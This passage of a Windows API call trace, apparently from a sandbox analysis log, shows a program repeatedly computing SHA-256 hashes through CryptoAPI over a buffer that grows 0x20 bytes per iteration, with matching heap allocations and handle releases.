	[0239.622] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.622] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.622] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0239.622] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0e18
	[0239.622] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0e18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0e18, pdwDataLen=0x128ba4) returned 1
	[0239.622] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.622] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.623] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.623] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.623] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0239.623] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.623] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0e40
	[0239.623] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0e40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0e40, pdwDataLen=0x128ba4) returned 1
	[0239.623] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.623] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.623] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.623] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.623] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0239.624] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0e68
	[0239.624] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0e68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0e68, pdwDataLen=0x128ba4) returned 1
	[0239.624] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.624] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.624] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.624] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.624] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0239.624] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0e90
	[0239.624] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0e90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0e90, pdwDataLen=0x128ba4) returned 1
	[0239.624] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.624] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.624] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.625] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.625] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0239.625] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.625] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0eb8
	[0239.625] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0eb8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0eb8, pdwDataLen=0x128ba4) returned 1
	[0239.625] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.625] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.625] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.625] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.625] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0239.625] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.625] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0ee0
	[0239.625] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0ee0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0ee0, pdwDataLen=0x128ba4) returned 1
	[0239.625] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.625] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.625] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.626] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.626] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0239.626] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0f08
	[0239.626] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0f08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0f08, pdwDataLen=0x128ba4) returned 1
	[0239.626] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.626] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.626] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.626] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.626] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0239.626] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0f30
	[0239.626] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0f30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0f30, pdwDataLen=0x128ba4) returned 1
	[0239.626] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.626] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.626] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.627] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.627] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0239.627] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.627] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0f58
	[0239.627] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0f58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0f58, pdwDataLen=0x128ba4) returned 1
	[0239.627] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.627] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.627] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.628] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.628] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0239.628] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.628] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0f80
	[0239.628] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0f80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0f80, pdwDataLen=0x128ba4) returned 1
	[0239.628] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.628] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.628] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.628] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.628] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0239.628] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0fa8
	[0239.629] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0fa8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0fa8, pdwDataLen=0x128ba4) returned 1
	[0239.629] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.629] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.629] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.629] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.629] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0239.629] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0fd0
	[0239.629] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0fd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0fd0, pdwDataLen=0x128ba4) returned 1
	[0239.629] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.629] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.630] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.630] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.630] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0239.630] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0ff8
	[0239.630] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0ff8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0ff8, pdwDataLen=0x128ba4) returned 1
	[0239.630] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.630] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.630] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.631] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.631] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0239.631] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1020
	[0239.631] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1020, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1020, pdwDataLen=0x128ba4) returned 1
	[0239.631] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.631] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.631] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.631] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.631] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0239.631] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1048
	[0239.631] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1048, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1048, pdwDataLen=0x128ba4) returned 1
	[0239.631] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.631] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.631] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.632] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.632] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0239.632] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1070
	[0239.632] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1070, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1070, pdwDataLen=0x128ba4) returned 1
	[0239.632] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.632] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.632] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.632] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.632] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0239.632] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.680] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1098
	[0239.680] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1098, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1098, pdwDataLen=0x128ba4) returned 1
	[0239.680] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.680] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.680] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.680] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.680] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0239.680] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.680] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c10c0
	[0239.680] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c10c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c10c0, pdwDataLen=0x128ba4) returned 1
	[0239.680] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.680] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.680] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.681] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.681] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0239.681] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.681] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c10e8
	[0239.681] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c10e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c10e8, pdwDataLen=0x128ba4) returned 1
	[0239.681] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.681] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.681] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.681] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.681] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0239.681] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.681] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1110
	[0239.681] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1110, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1110, pdwDataLen=0x128ba4) returned 1
	[0239.681] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.681] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.682] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.682] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.682] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0239.682] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.682] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1138
	[0239.682] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1138, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1138, pdwDataLen=0x128ba4) returned 1
	[0239.682] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.682] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.682] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.682] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.682] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0239.683] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.683] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1160
	[0239.683] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1160, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1160, pdwDataLen=0x128ba4) returned 1
	[0239.683] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.683] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.683] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.683] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.683] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0239.683] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.683] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1188
	[0239.683] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1188, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1188, pdwDataLen=0x128ba4) returned 1
	[0239.683] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.683] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.683] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.684] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.684] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0239.684] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.684] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c11b0
	[0239.684] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c11b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c11b0, pdwDataLen=0x128ba4) returned 1
	[0239.684] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.684] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.684] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.684] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.684] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0239.684] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.684] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c11d8
	[0239.684] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c11d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c11d8, pdwDataLen=0x128ba4) returned 1
	[0239.684] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.684] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
